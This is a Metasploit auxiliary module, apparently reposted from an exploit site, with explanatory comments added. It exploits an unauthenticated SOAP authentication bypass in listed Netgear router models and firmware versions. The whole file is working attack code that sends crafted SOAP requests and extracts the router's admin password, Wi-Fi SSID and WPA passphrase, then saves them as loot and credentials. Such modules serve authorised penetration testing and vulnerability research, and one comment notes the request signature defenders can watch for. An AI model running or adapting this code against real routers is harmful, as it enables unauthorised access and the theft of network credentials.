## https://sploitus.com/exploit?id=PACKETSTORM:180851
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
# Auxiliary module: sends unauthenticated SOAP requests to a Netgear router's
# web server and reads device details, the admin password and wireless
# settings out of the XML responses. Findings are printed, saved as loot and
# (for the admin password) recorded as a credential via the Report mixin.
#
# Every request has the same fixed shape (POST to '/', body '=', a
# 'SOAPAction' header naming a urn:NETGEAR-ROUTER:... action), which is also
# what a defender would key on when looking for this probe in web logs.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Module metadata only; no options are registered beyond the HttpClient
  # defaults (RHOSTS/RPORT/etc. come from the mixin).
  def initialize
    super(
      'Name' => 'Netgear Unauthenticated SOAP Password Extractor',
      'Description' => %q{
This module exploits an authentication bypass vulnerability in different Netgear devices.
It allows to extract the password for the remote management interface. This module has been
tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:
NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,
NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),
NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),
NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),
NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),
NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),
NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),
NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),
NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),
NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),
NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)
      },
      'References' => [
        [ 'BID', '72640' ],
        [ 'OSVDB', '118316' ],
        [ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]
      ],
      'Author' => [
        'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery
        'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
        'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Feb 11 2015'
    )
  end

  # Entry point. Issues four SOAP actions in sequence, each through
  # #extract_data, which decides what to report from the response body.
  # Each call is independent: a failed or filtered response for one action
  # does not stop the following ones.
  def run
    print_status('Trying to access the configuration of the device')

    # extract device details
    action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'
    print_status('Extracting Firmware version...')
    extract_data(action)

    # extract credentials
    action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'
    print_status('Extracting credentials...')
    extract_data(action)

    # extract wifi info
    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'
    print_status('Extracting Wifi...')
    extract_data(action)

    # extract WPA info
    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'
    print_status('Extracting WPA Keys...')
    extract_data(action)
  end

  # Sends one SOAP request and reports whatever known XML elements appear in
  # the reply. The same parser runs for every action, so which of the
  # branches below fire depends only on the response content.
  #
  # @param soap_action [String] value placed in the 'SOAPAction' header
  # @return [nil] always; results are emitted through print_*/store_loot and
  #   #extract_credentials rather than returned
  def extract_data(soap_action)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/',
      'headers' => {
        'SOAPAction' => soap_action
      },
      'data' => '='
    })

    # Bail out quietly on no reply, a 404, or a missing/unexpected Server
    # header. The Server check is the only fingerprint applied before the
    # body is parsed; note the regex is unanchored and its dots are unescaped.
    return if res.nil?
    return if res.code == 404
    return if res.headers['Server'].nil?
    # unknown if other devices have other Server headers
    return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}

    # Password present: hand the whole body to #extract_credentials, which
    # does the per-line match, credential creation and loot storage.
    if res.body =~ %r{<NewPassword>(.*)</NewPassword>}
      print_status('Credentials found, extracting...')
      extract_credentials(res.body)
    end

    if res.body =~ %r{<ModelName>(.*)</ModelName>}
      model_name = ::Regexp.last_match(1)
      print_good("Model #{model_name} found")
    end

    # Device-detail loot is only written when a Firmwareversion element is
    # present, i.e. for the DeviceInfo reply.
    if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}
      firmware_version = ::Regexp.last_match(1)
      print_good("Firmware version #{firmware_version} found")

      # store all details as loot
      loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)
      print_good("Device details downloaded to: #{loot}")
    end

    if res.body =~ %r{<NewSSID>(.*)</NewSSID>}
      ssid = ::Regexp.last_match(1)
      print_good("Wifi SSID: #{ssid}")
    end

    if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}
      wifi_encryption = ::Regexp.last_match(1)
      print_good("Wifi Encryption: #{wifi_encryption}")
    end

    # Wireless passphrase is printed only; unlike the admin password it is
    # not recorded through create_credential_and_login.
    if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}
      wifi_password = ::Regexp.last_match(1)
      print_good("Wifi Password: #{wifi_password}")
    end
  rescue ::Rex::ConnectionError
    # Connection failures are verbose-only; the caller keeps going with the
    # next action.
    vprint_error('Failed to connect to the web server')
    return
  end

  # Records every <NewPassword> element in the body as an 'admin' credential
  # and stores the raw body as loot.
  #
  # @param body [String] full response body of the LANConfigSecurity reply
  # @return [nil] results are emitted via print_good, create_credential_and_login
  #   and store_loot
  def extract_credentials(body)
    # Line-by-line so that each <NewPassword> occurrence yields its own
    # credential entry.
    body.each_line do |line|
      next unless line =~ %r{<NewPassword>(.*)</NewPassword>}

      pass = ::Regexp.last_match(1)
      print_good("admin / #{pass} credentials found")

      # Status is UNTRIED: nothing in this module attempts a login with the
      # value. fullname and service_details are supplied by the framework
      # mixins, not defined here.
      connection_details = {
        module_fullname: fullname,
        private_data: pass,
        private_type: :password,
        username: 'admin',
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details)
      create_credential_and_login(connection_details)
    end

    # store all details as loot
    loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)
    print_good("Account details downloaded to: #{loot}")
  end
end